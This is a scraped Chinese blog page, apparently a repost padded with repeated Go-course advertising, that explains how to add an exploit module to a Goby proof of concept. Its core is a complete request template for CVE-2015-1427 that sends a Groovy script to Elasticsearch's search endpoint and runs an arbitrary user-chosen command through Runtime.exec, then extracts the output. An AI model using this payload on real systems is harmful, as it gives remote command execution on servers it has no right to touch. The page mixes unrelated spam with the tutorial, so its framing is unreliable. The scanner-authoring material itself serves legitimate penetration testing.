2024年Go最全如何编写合格的 PoC 领取 Goby 红队专版_goby自定义poc(1),你会的还只有初级工程师的技术吗

最新推荐文章于 2024-08-01 15:33:03 发布
最新推荐文章于 2024-08-01 15:33:03 发布
阅读量255 收藏 4
点赞数 3
分类专栏: 程序员 文章标签: go 学习 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84925044/article/details/138826716
版权

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

在这里插入图片描述

2.2 不太简单的PoC中的Exp

你以为PoC做好了?没有,一半了,如开头图中所示需要三个带Exp的漏洞,所有自己的PoC必须要Exp功能,然后Exp功能还没有图形化点一点的界面,而《Goby漏洞编写指南》中对Exp的制作也只有个例子,没看到详细解释(可能我没看全),但是有一个TP的demo,通过这个demo我们也能照猫画虎做Exp了。
在这里插入图片描述
制作Exp需要开启图形中的验证接口,你会好奇上图所示的“验证”为什么我没有,需要去手动编辑Exp模块了。

在这里插入图片描述

编辑器中可以看到你的PoC的json文件,默认的HasExp值为false,开启改true即可,ExpParams则是前端需要传递给 Exp 的参数,如要执行的命令。
以CVE-2015-1427为例需要自定义命令,一个输入参数,需要将ExpParams改为:

"ExpParams": [
    {
      "name": "cmd",
      "type": "input",
      "value": "whoami"
    }
  ]

不解释上述json了直接感受一下效果:

在这里插入图片描述

现在为止GUI中已经开启Exp了,但实际还没有“验证”功能,需要再回到“编辑器”中编写“验证功能”,找到json中的ExploitSteps默认值为null,继续以CVE-2015-1427为例需要两次Requests修改为:

"ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "POST",
        "uri": "/website/blog/",
        "follow\_redirect": true,
        "header": {
          "Accept-Encoding": "gzip, deflate",
          "Accept": "\*/\*",
          "Connection": "close",
          "Accept-Language": "en",
          "Content-Type": "application/x-www-form-urlencoded"
        },
        "data\_type": "text",
        "data": "{ \"name\": \"cve-2015-1427\" }"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "201",
            "bz": ""
          }
        ]
      },
      "SetVariable": [
        "output|lastbody"
      ]
    },
    {
      "Request": {
        "method": "POST",
        "uri": "/\_search?pretty",
        "follow\_redirect": true,
        "header": {
          "Accept-Encoding": "gzip, deflate",
          "Accept": "\*/\*",
          "Connection": "close",
          "Accept-Language": "en",
          "Content-Type": "application/text"
        },
        "data\_type": "text",
        "data": "{\"size\":1, \"script\_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"{{{cmd}}}\\\").getText()\"}}}"
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "460f7ccb583e25e09c0fe100a2c9e90d",
            "bz": ""
          }
        ]
      },
      "SetVariable": [
        "output|lastbody|regex|(?s)\"lupin\" : \\[ \"(.\*)\" \\]"
      ]
    }
  ]

可以看到上述json中 Requests 和PoC中的ScanSteps的Requests 是一致的,就不难理解是同样的发包,只不过一个在ScanSteps一个是ExploitSteps,现在应该也就大概理解这个json的大致功能了,上边看着乱简化一下:

"ExploitSteps": [
    "AND",
    {
      "Request": {xxxxxx},
      "ResponseTest": {xxxxxx},
      "SetVariable": [xxxxxx]
    },
    {
      "Request": {xxxxxx},
      "ResponseTest": {xxxxxx},
      "SetVariable": [xxxxxx]
    }
  ]

到这里应该都指知道Requests用来发包,ResponseTest用来判断是否满足判断SetVariable则会在“验证”功能中回显Body。
我在看官方提供的Exp demo中发现TP的RCE去掉了ResponseTest,我也跟着试,结果只发送第一个Requests不发第二个,后续找@go0p发现是去掉了ResponseTest的锅。
最后控制一下RCE的回显,TP的demo中SetVariable写的是:

"SetVariable": [
        "output|lastbody"
      ]

这里的效果就是显示整个Body。
在这里插入图片描述

看起来比较凌乱,不过SetVariable中也有过滤可用,例如regex去正则。

"SetVariable": [
        "output|lastbody|regex|(?s)\"lupin\" : \\[ \"(.\*)\" \\]"
      ]

在这里插入图片描述

到这里一个带Exp的PoC就制作好了,如果你觉得PoC逻辑编写没为题但又怎么都不成功就只能反复测试反复抓包了,找你的wireshark好帮手,慢慢测慢慢排,最终完整的PoC一定出的来。

img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!**

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以戳这里获取

2401_84925044
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Goby-poc 161个
07-05
Goby定义poc
Goby-poc438个自定义goby-poc
08-10
Goby-poc438个自定义goby-poc】是一个集合,包含了438个针对Goby框架的自定义检测点(Proof of Concept,简称POC),这些POC主要用于网络安全领域的漏洞扫描和渗透测试。Goby是一个开源的安全测试框架,它的...
2024年Go最新关于 Goby 专版获取指南!(1),2024年最新为什么阿里的程序员成长如此之快
2401_84925284的博客
05-11 547
专版发布以来,受到大家热情的关注,申请人数大大大超出了我们的预期。为避免 Goby 沦为黑客非法用途工具,我们选择的开放专版。对于没有及时处理与回复,深感歉意。现经过短时间审视及复盘,重新完善了申请流程,
Goby POC,1275个,自己在网络上收集的,基本是网上能找到的最全的了
07-24
我自己在网络上收集的GobyPOC,导出后是1275个,列表如下,列表写不全的,有兴趣的话,自己下载下来研究一下吧,最近我又想着自己去写一些POC供给大家用,暂时没有时间和动力,再等一段时间的吧。 TamronOS_IPTV_...
GOBY GOBY205REDTEAM-1288-POCS-by-hlop-orz-zen
11-16
【标题】"GOBY 版"指的是一个针对操作的工具包或软件版本,名为GOBY,特别标记为205REDTEAM,版本号为1288,由hlop_orz_zen进行POCS(Proof of Concept,概念验证)开发。这个版本可能是一个定制的安全测试...
goby 150个自定义POC
05-18
ACTI_camera_images_File_read.go Active_UC_index.action_RCE.json Adslr_Enterprise_online_behavior_management_system_Information_leakage.json Alibaba_Nacos_Add_user_not_authorized.json Alibaba_...
Goby 最全最新POC共计448个
08-30
Goby 最全最新POC共计448个 包含了致远OA A6 用户敏感信息泄露、Apache_Druid_Log4shell_CVE_2021_44228、Apache_JSPWiki_Log4shell_CVE-2021-44228、VMware_NSX_Log4shell_CVE_2021_44228、VMware_vCenter_Log4...
Python每日学习
q2903160397的博客
07-21 2022
我是从c++转来学习Python的,总感觉和c++相比Python的实操简单,但是由于写c++的代码多了,感觉Python的语法好奇怪。由于今天是我正式学Python的第一天,干货不多,以后让我们一步一步来见证Python这个优雅的代码的学习之路吧!),这种格式对于我来说已成习惯了,而这一切Python这个优雅的语言通通没有,学习Python这将是道阻且长。今天就简单了解了一下Python的起源和成长并学习了打印 halloworld,算是开始学习了吧。)而且它每一项的代码结束之后要有一个表示结束的封号(
爬虫学习4:爬取王者荣耀技能信息
mohanyelong的博客
07-22 2295
爬取王者荣耀技能信息(代码和代码流程)。
《计算机网络》(学习笔记)
qiqi_liuliu的博客
07-24 2433
网络(Network)由若干结点(Node)和连接这些结点的链路(Link)组成多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,即互联网(互连网)。因此,互联网是"网络的网络(Network of Networks)"因特网(Internet)是世界上最大的互连网络(用TCP/IP)internet是通用名词,互连的网络都叫internet注:互连、自治、集合。在计算机内部或在相邻设备之间近距离传输时,可不经过调制就在信道上直接进行的传输方式称为基带传输。
追问试面试系列:类加载
田维常
07-27 99
");运行结果:错误: 在类 java.lang.String 中找不到 main 方法, 请将 main 方法定义为:否则 JavaFX 应用程序类必须扩展javafx.application.Application面试回答:可以定义,但是当我们定义一个java.lang.String类和rt.jar包中的String一模一样时,是不能运行的。因为JVM在类加载过程中,先去加载rt.jar包中的String类,而不加载我们自定义的String类。
(面试必看!)一些和多线程相关的面试考点
2302_78814792的博客
07-28 1169
本篇文章总结了多线程中面试频率比较高的考点,内容可能比较琐碎,但是如果能够坚持看完,注意总结积累,相信对面试有很大帮助。多线程内容较多,用一篇文章写完可能篇幅过长,我打算用两篇文章来总结,本篇主要写的是多线程中辅助加锁的数据结构和指令,下一篇主要讲的是锁策略。
规控面试常见问题
每天进步一点点。
07-28 141
(1)A*在节点的扩张时,只进行相邻节点的直线移动,没有考虑实际底盘的运动学模型(物理模型),而Hybrid A*在每次节点扩张的时候,对下个位置进行离散状态空间的采样(比如 旋转角度、前进距离、前进/后退),选择动作之后就可以根据运动学模型计算下一个位置点的位姿,每次扩展的时候选择代价最小的节点进行扩展就能逐步到到目标点。// 8领域的坐标x y 和 g。A*受限于邻近栅格之间的连线,A*在搜索过程中扩展节点的方向被网格形状固定,一般为8邻接,导致路径呈波浪状,不平滑,发生抖动,冗余节点过多。
【前端面试】九、框架
weixin_49015558的博客
07-31 390
1 Vue2 实现方式 2 Vue3 实现方式 3 React 实现方式 4 Angular 实现方式
Java 面试常见问题之——为什么重写equals时必须重写hashCode方法
一名资深Java工程师的技术分享
08-01 191
重写 equals 方法时重写 hashCode 方法可以保证对象在哈希相关的数据结构中的行为符合预期,保持一致性,并提高性能。
Postman高频面试题及答案汇总(接口测试必备)
最新发布
2301_80119299的博客
08-01 449
十八、Postman中,当环境变量、Collection、全局变量重名时,优先使用哪个变量?六、Postman中全局/环境/集合变量的优先级是怎样的?十三、Postman你在工作中使用流程是什么样的?一、Postman在工作中使用流程是什么样的?二十一、Postman 你使用过哪些内置变量?九、Postman 你使用过哪些内置变量?二十、Postman 自定义变量如何做?二、你使用过Postman的哪些功能?八、Postman 自定义变量如何做?十、Postman 如何做持续集成?
【前端面试3+1】20 css三栏布局6种实现方式、多行文本溢出怎么实现、token过期了怎么处理、【二叉树的中序遍历】
qq_61798306的博客
07-30 677
本文包含八股文:css三栏布局6种实现方式、多行文本溢出怎么实现、token过期了怎么处理,算法【二叉树的中序遍历】
loguru日志模块:简化Python自动化测试的日志管理!
07-29 804
日志是软件开发中的关键组成部分,为开发和测试人员提供了调试和监控应用程序的重要手段。loguru 是一个第三方的 Python 日志库,以其简洁的 API 和自动化的功能脱颖而出。本文将探讨为什么项目中需要日志,loguru 为何受到青睐,以及如何封装和在接口自动化测试项目中使用 loguru,同时结合 Allure 生成丰富的测试报告。
追问试面试系列:开篇
田维常
07-27 178
背面试八股文的新方法
gobypoc
08-20
GobyPOC是一个专门为渗透测试设计的工具。渗透测试是指模拟攻击者的技术和策略来评估组织的网络安全防御能力,并识别潜在的漏洞和弱点。GobyPOC通过发现、测试和利用网络系统和应用程序中的漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值